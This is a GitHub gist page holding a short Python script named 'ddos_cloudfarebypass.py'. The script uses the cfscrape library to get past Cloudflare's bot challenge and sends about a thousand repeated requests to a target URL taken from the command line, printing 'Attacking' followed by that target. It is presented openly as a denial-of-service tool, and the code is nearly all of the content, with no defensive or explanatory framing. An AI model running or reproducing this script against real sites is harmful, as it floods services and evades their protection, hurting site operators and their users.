Skip to content

Instantly share code, notes, and snippets.

@alsyundawy
Forked from cthpw103/ddos_cloudfarebypass.py
Created April 17, 2018 08:52
Show Gist options
  • Save alsyundawy/5a50659c3ae32872c7ba391e11ec46fe to your computer and use it in GitHub Desktop.
Save alsyundawy/5a50659c3ae32872c7ba391e11ec46fe to your computer and use it in GitHub Desktop.
ddos
#Bypass by cth103
#i'm sorry
#og code by tin-tnguyen
#DDoS without caring bout cloudfare
import cfscrape, sys, os
print "Attacking " + sys.argv[1] + " ... "
def attack():
scraper = cfscrape.create_scraper()
print "Requesting.."
scraper.get(sys.argv[1])
print "Ended Requesting"
for i in range(1, 1000):
attack()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment